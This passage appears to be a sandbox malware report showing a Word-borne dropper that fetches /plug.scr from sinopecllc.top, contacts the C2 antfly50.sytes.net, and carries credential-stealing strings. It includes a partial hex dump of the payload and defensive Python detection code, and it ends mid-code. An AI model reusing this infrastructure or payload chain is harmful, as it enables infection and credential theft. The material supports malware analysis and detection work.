Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80

                  Networking

Source: Malware configuration extractor | URLs: antfly50.sytes.net
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 80.85.154.121:1980
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Mon, 01 Jul 2024 11:58:01 GMT | Content-Type: application/x-silverlight | Content-Length: 1140744 | Connection: keep-alive | Last-Modified: Mon, 01 Jul 2024 02:59:13 GMT | ETag: "116808-61c26c839c3ba" | Accept-Ranges: bytes | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 1b 82 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 14 11 00 00 1c 00 00 00 00 00 00 9e 33 11 00 00 20 00 00 00 40 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 33 11 00 4f 00 00 00 00 40 11 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 32 11 00 08 36 00 00 00 60 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 13 11 00 00 20 00 00 00 14 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 19 00 00 00 40 11 00 00 1a 00 00 00 16 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 11 00 00 02 00 00 00 30 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 33 11 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 84 00 00 9c 5c 00 00 03 00 00 00 32 00 00 06 7c e1 00 00 d0 51 10 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 18 00 00 0a 00 00 02 28 03 00 00 06 00 2a 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 19 00 00 0a 00 00 02 03 28 1a 00 00 0a 00 2a 00 13 30 03 00 a3 01 00 00 02 00 00 11 00 d0 02 00 00 02 28 1b 00 00 0a 73 1c 00 00 0a 0a 02 73 1d 00 00 0a 7d 02 00 00 04 02 28 1e 00 00 0a 00 02 7b 02 00 00 04 16 6f 1f 00 00 0a 00 02 7b 02 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 02 00 00 04 19 6f 22 00 00 0a 00 02 7b 02 00 00 04 6f 23 00 00 0a 16 6f 24 00 00 0a 00 02 7b 02 00 00 04 6f 23 00 00 0a 28 20 00 00 0a 6f 25 00 00 0a 00 02 7b 02 00 00 04 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 06 72 01 00 00 70 6f 27 00 00 0a 74 1f 00 00 01 6f 28 00 00 0a 00 02 7b 02 00 00 04 20 42 01 00 00 1f 36 73 29 00 00 0a 6f 2a 00 00 0a 00 02 7b 02 00 00 04 72 1f 00 00 70 6f 2b 00 00 0a 00 02 7b 02 00 00 04 20 3e 01 00 00 20 3f 01 00 00 73 2c 00 00 0a 6f 2d 00 00 0a 00
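The response entry above declares Content-Type: application/x-silverlight, but its body begins with 4d 5a ("MZ"), followed at offset 0x80 by the "PE\0\0" signature: the server is delivering a Windows executable under a non-executable label. The Python below is an added example, written for this page and not part of the Joe Sandbox report, that parses the first 160 bytes of that body (transcribed from the "Data Raw" dump above) and flags the mismatch between the declared type and the PE magic. From the same bytes it recovers the COFF header: machine 0x14c (i386), 3 sections (the dump further on names them .text, .rsrc and .reloc), Characteristics 0x0102 (EXECUTABLE_IMAGE, 32-bit), a PE32 optional header, a linker version of 48.0 as written by the .NET C# compiler rather than a native linker, and the TimeDateStamp 0x66821b17, i.e. 2024-07-01 02:57:27 UTC, about two minutes before the Last-Modified header. The set of content types treated as an honest label for an executable body is my assumption.

```python
import struct
import time

# Constructed input, transcribed from the report entry above: the response headers and
# the first 160 bytes of the body ("Data Raw: 4d 5a 90 00 ...").
RESPONSE_HEADERS = {
    "Server": "nginx",
    "Content-Type": "application/x-silverlight",
    "Content-Length": "1140744",
}
BODY_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"   # DOS header: "MZ"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000080000000"   # e_lfanew = 0x80 at offset 0x3c
    "0e1fba0e00b409cd21b8014ccd215468"   # DOS stub: "This program cannot be run in DOS mode."
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    "504500004c010300171b826600000000"   # "PE\0\0", Machine, NumberOfSections, TimeDateStamp
    "00000000e00002010b01300000141100"   # SizeOfOptionalHeader, Characteristics, Magic, linker
)

# Content types under which an executable body is at least honestly labelled (assumption).
EXECUTABLE_TYPES = {
    "application/x-msdownload",
    "application/x-dosexec",
    "application/vnd.microsoft.portable-executable",
}
MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000


def parse_pe_prefix(data: bytes) -> dict:
    """Parse the DOS header, PE signature, COFF file header and the first bytes of the
    optional header. Only the leading e_lfanew + 28 bytes are needed, so this works on
    a truncated capture like the one in the report. Raises ValueError for non-PE data."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 28 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_magic, link_major, link_minor = struct.unpack_from("<HBB", data, e_lfanew + 24)
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "compile_time_utc": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timestamp)),
        "is_executable_image": bool(characteristics & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "optional_header_size": opt_size,
        "pe_format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic)),
        "linker_version": f"{link_major}.{link_minor}",
    }


def assess_response(headers: dict, body: bytes) -> dict:
    """Compare the declared Content-Type with what the body actually is."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    try:
        pe = parse_pe_prefix(body)
    except ValueError:
        return {"declared_type": declared, "is_pe": False, "mismatch": False, "pe": None}
    return {
        "declared_type": declared,
        "is_pe": True,
        "mismatch": declared not in EXECUTABLE_TYPES,
        "pe": pe,
    }


if __name__ == "__main__":
    verdict = assess_response(RESPONSE_HEADERS, BODY_PREFIX)
    for key, value in verdict.items():
        print(f"{key}: {value}")
```

The same check runs unchanged on a proxy or NDR capture: any body that parses as PE while the declared type is an image, archive, plugin or document type is worth an alert on its own, independent of the Sigma rules the report fired.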
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: CHELYABINSK-SIGNAL-ASRU
Source: Joe Sandbox View | ASN Name: GLESYS-ASSE
Source: global traffic | HTTP traffic detected: GET /plug.scr HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: sinopecllc.top | Connection: Keep-Alive
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5181AA1-4E9C-4A6F-AAB0-9D832B2C367F}.tmp
Source: global traffic | HTTP traffic detected: GET /plug.scr HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: sinopecllc.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: plugman23456.scr | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: plugman23456.scr, 00000015.00000002.392501517.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: plugman23456.scr, 00000015.00000002.392501517.00000000002CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: sinopecllc.top
Source: global traffic | DNS traffic detected: DNS query: antfly50.sytes.net
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
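Three names are resolved in this section but only two of them ever appear as an HTTP Host (sinopecllc.top for the plug.scr download, geoplugin.net for the geolocation lookup); the third, antfly50.sytes.net, is the value the configuration extractor pulled from the sample, and the only non-HTTP flow in the report is the one to 80.85.154.121:1980. The Python below is an added example, written for this page and not part of the Joe Sandbox report, that reduces entries in this layout to that kind of summary: it keys "TCP traffic" entries on the remote endpoint so that both directions of one connection (and, on this page, its 235 per-segment lines) land on a single counter, pulls the Host out of HTTP requests even where the header lines have been run together by extraction, and lists the resolved names that were never used as an HTTP Host, which is where a raw-TCP C2 shows up. The sample lines are constructed from this section; the parser accepts both the separated layout and the run-together one ("global trafficHTTP traffic detected"). Whether 80.85.154.121 is in fact the address antfly50.sytes.net resolved to is not stated on the page and is not asserted by the code.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample in the layout of this report section. The last line keeps the
# run-together form produced by the original extraction, to show it is tolerated.
SAMPLE_LINES = """
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 80.85.154.121:1980
Source: Malware configuration extractor | URLs: antfly50.sytes.net
Source: global traffic | DNS traffic detected: DNS query: sinopecllc.top
Source: global traffic | DNS traffic detected: DNS query: antfly50.sytes.net
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
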